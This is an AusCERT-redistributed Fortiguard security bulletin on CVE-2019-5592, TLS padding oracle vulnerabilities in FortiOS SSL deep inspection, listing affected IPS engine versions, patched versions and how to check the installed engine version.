Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2019.2765.2
FortiOS SSL Deep Inspection TLS Padding Oracle Vulnerabilities
28 February 2020
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: FortiOS
Publisher: Fortiguard
Operating System: Network Appliance
Impact/Access: Access Privileged Data -- Remote with User Interaction
Resolution: Patch/Upgrade
CVE Names: CVE-2019-5592
Original Bulletin:
https://fortiguard.com/psirt/FG-IR-19-145
Revision History: February 28 2020: Vendor updated advisory
July 24 2019: Initial Release
- --------------------------BEGIN INCLUDED TEXT--------------------
FortiOS SSL Deep Inspection TLS Padding Oracle Vulnerabilities
IR Number : FG-IR-19-145
Date : Jul 23, 2019
Risk : 3/5
Impact : Information Disclosure
CVE ID : CVE-2019-5592
CVE ID : CVE-2019-5592
Summary
Multiple padding Oracle vulnerabilities (Zombie POODLE, GOLDENDOODLE, OpenSSL
0-length) in the CBC padding implementation of FortiOS when configured with SSL
Deep Inspection policies and with the IPS sensor enabled may allow an attacker
to decipher TLS connections going through the FortiGate by monitoring the
traffic (should he/she be able to).
Impact
Information Disclosure
Affected Products
FortiOS when using the following IPS Engine versions:
IPS engine version 5.00000 to 5.00006
IPS engine version 4.00000 to 4.00036
IPS engine version 4.00200 to 4.00219
IPS engine version 3.00547 and below
Solutions
Update to IPS engine 3.00548, 4.00037, 5.00007 or above.
Specifically:
IPS Engine 3.00548 (or above) for the FortiOS 5.6 branch and branches below
IPS Engine 4.00037 (or above) for the ForitOS 6.0 branch
IPS Engine 5.00007 (or above) for the FortiOS 6.2 branch
An IPS Engine that includes the fix is built-in FortiOS 5.6.11, 6.0.9 and
6.2.1, and versions above in those respective branches.
To check for the FortiOS IPS engine version:
* From the admin CLI console:
run command "diag autoupdate versions"
IPS Attack Engine
Version: x.xxxxx
* From the admin webUI:
System->FortiGuard->IPS Engine->Version x.xxxxx
For the IPS engine and FortiOS version compatibility chart, please refer the
following link:
https://pub.kb.fortinet.com/ksmcontent/Fortinet-Public/current/FortiGate_6_0/
fortios-fortiaps-ips-av-compatibility.pdf
Revision History:
07-23-2019 Initial version
02-25-2020 Added FortiOS versions with built-in IPS Engines.
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBXliV7GaOgq3Tt24GAQhgVBAAmxQsnDJbw1KZq1SkmLr5BARSJx0RDuOQ
buYsbKXOA8ksU6Ggc4XFKCQEAynLXu9MrRLDcpAK6hYobxEc2EortjrebnS7VlYZ
EUv1DA9xacK70cq0e56Tm63VNpYxy+FWhKALt84fPf62iMSw5sxtEYgmzqO1azyt
wAyzAhYAOkGCdquF1VjzIlK0GKl4jVbGEu3c92FFD6F1pWmRR01bvfFh+sKk/4M6
XFWmeQZcCljHzAhpFz53IQqZK92xcYPy/+Ml/ec0NW/3CCpyI6kAhXKu2C3CFPa/
+698p6FM2DA5dP2GAGylwD3jeCjUqov9k4yxnLXUKAiRd+ukBS12EcXgl1C8WhhK
U1s8urAORcfmvpbt2xezLGba5u4dwbeGYwS/1t116zAgr6yBDb6g+epJdfMAn5Ok
ucF5StC5ZMF2vUF8fw6nZ3mLvw+Ju/Sd2ObMZXL/xsGbiYbyEji5Ofw0gTYPtOE0
CD88x9yeMIl0LfDYxbg2B2Qm79ENn8U6Ih8b/Rrj30D+ojI+tWTJ1CBoV0aNAa5v
cKMYD7nVCxiXDnrcXOm1rXQlpXDv0htRq3f3wjORN7th3vtYmJ4DsJZWNbZjKm5X
pXJxeEMai9ULEtojyjeghgNU0P2DudcbGCS54n3ysVUABWgHLcF48zrwVYAetCmw
tjuRWJTjExU=
=XG5j
-----END PGP SIGNATURE-----